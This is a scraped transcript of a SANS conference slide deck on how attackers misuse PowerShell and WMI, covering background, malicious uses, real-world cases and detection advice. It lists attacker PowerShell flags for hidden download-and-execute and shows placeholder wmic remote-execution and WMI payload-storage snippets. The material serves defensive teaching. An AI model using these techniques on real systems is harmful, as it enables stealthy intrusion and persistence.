SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts...
Transcript of SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts...
![Page 1: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/1.jpg)
![Page 2: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/2.jpg)
![Page 3: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/3.jpg)
• Quick Background• Malicious Possibilities• Real-World Examples• Detection & Defense
![Page 4: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/4.jpg)
• Joe Slowik, Adversary Hunter• Current: Dragos Adversary Hunter• Previous:
• Los Alamos National Lab: IR Lead• US Navy: Information Warfare Officer• University of Chicago: Philosophy Drop-Out
![Page 5: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/5.jpg)
• Scripting and interactive language• Introduced in 2006, integral to Win7+
since 2009• Full access to COM & WMI for system
administration
![Page 6: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/6.jpg)
• WMI = Windows Management Instrumentation
• Interactive and scriptable framework for local and remote administration
• Frequently accessed via PowerShell
![Page 7: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/7.jpg)
http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
![Page 8: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/8.jpg)
http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
![Page 9: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/9.jpg)
http://www.opentechguides.com/how-to/article/powershell/132/get-system-info-remotely.html
![Page 10: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/10.jpg)
https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
![Page 11: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/11.jpg)
http://www.freeiconspng.com/img/17209
• PowerShell is a powerful, useful tool for network administration
• Widely used in Windows Enterprise environments
![Page 12: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/12.jpg)
• WMI enables significant access to review and modify system data
• Access via PowerShell allows for scripting and automated possibilities
![Page 13: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/13.jpg)
![Page 14: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/14.jpg)
• PowerShell’s ubiquity adds a significant capability to potential attacker
• Enhances ability to ‘live off the land’• Expands initial infection vectors
![Page 15: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/15.jpg)
Command Use
-EncodedCommand Accepts Base64-encoded input for execution within PowerShell
(New-Object System.New.Webclient).DownloadFile()
Download a file from a remote location; can be piped to Start-Process to execute
-ExecutionPolicy Bypass Circumvent system limits on script execution
-WindowStyle Hidden Hide the command window from the user
-Invoke-Expression Execute arbitrary code or commands
![Page 16: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/16.jpg)
DeliveryVectors
VBA
VBS
BAT
JS
Registry
Startup.lnk
![Page 17: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/17.jpg)
https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
![Page 18: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/18.jpg)
• WMI is also ubiquitous, potent ‘dual-use’• Can enable:• Complex exploitation, persistence of
infected host• New vectors to pivot within network
![Page 19: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/19.jpg)
![Page 20: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/20.jpg)
• PsExec-like remote execution• Malicious file/script storage• Persistence when combined with file or
registry activity
![Page 21: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/21.jpg)
• Pentesting frameworks• Crimeware/Commodity malware• APT
![Page 22: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/22.jpg)
![Page 23: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/23.jpg)
![Page 24: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/24.jpg)
• Malicious VBA decodes to PowerShell• Retrieves, then executes ransomware
payload
![Page 25: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/25.jpg)
![Page 26: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/26.jpg)
• WMI used to probe security settings
• Written to file for retrieval
• Strengthens system survey
![Page 27: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/27.jpg)
• WMI filter retrieved on schedule• Returns base64-encoded PowerShell• PowerShell re-launches backdoor
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
![Page 28: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/28.jpg)
![Page 29: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/29.jpg)
https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
![Page 30: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/30.jpg)
CMD•Command
execution
• Execution Parameters
PowerShell• Interactive and
Scripts
• Flags, Modifiers, full Visibility
WMI• Log Events
• Correlate with Other Activity
![Page 31: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/31.jpg)
What is required to
achieve ‘bad’?
Process Execution
PersistenceEncodeDecode
DownloadUpload
![Page 32: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/32.jpg)
• Sysinternals Sysmon• Windows Loggging Service (WLS)• WMI Logging via WMI Subscription• PowerShell Logging• Proprietary Host-based Security
![Page 33: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/33.jpg)
• WLS incorporates PowerShell logging natively• Otherwise:
• Windows 7+• Powershell 5.0+• Enable logging!
• See: • https://www.fireeye.com/blog/threat-
research/2016/02/greater_visibilityt.html
![Page 34: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/34.jpg)
• Sysinternals Sysmon – latest version includes WMI visibility• But logging/alerting will need to be
tuned• DIY via WMI Subscription creation• Otherwise – commercial products
![Page 35: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/35.jpg)
Establish Visibility
Baseline ‘Normal’
Identify Malicious
Create Alerts & Alarms
Develop Response
![Page 36: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/36.jpg)
• What PowerShell/WMI scripts are used in ‘normal’ network administration?
• What commands never have legitimate use?
• What – if any – items require whitelisting?
![Page 37: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/37.jpg)
![Page 38: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/38.jpg)
wmic /node:REMOTESYSTEM process call create “EVIL_COMMAND”
SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE “%VMware%”
$BADTHING=New-ObjectManagement.ManagementClass($REMOTESYSTEM,
[String]::Empty,$null)
$BADTHING[‘__CLASS’]=’Evil_Malware’
$BADTHING.Properties.Add(‘SomethingEvil’,[Management.CimType]
::String,$False)
$BADTHING.Properties[‘SomethingEvil’].Value =$PAYLOAD
$EvilClass.Put()
![Page 39: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/39.jpg)
![Page 40: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/40.jpg)
• Create Event Consumer: performs action when triggered by event
• Pair with Event Filter: events of interest• Filter to Consumer Binding: bind filter to
consumer• Export results to log file, data store• Credit: https://www.fireeye.com/blog/threat-
research/2016/08/wmi_vs_wmi_monitor.html
![Page 41: SANS Cyber Security Certifications & Research - …...Command Use-EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile()](https://reader036.fdocuments.net/reader036/viewer/2022070713/5ed1610b5e30c94ed843476a/html5/thumbnails/41.jpg)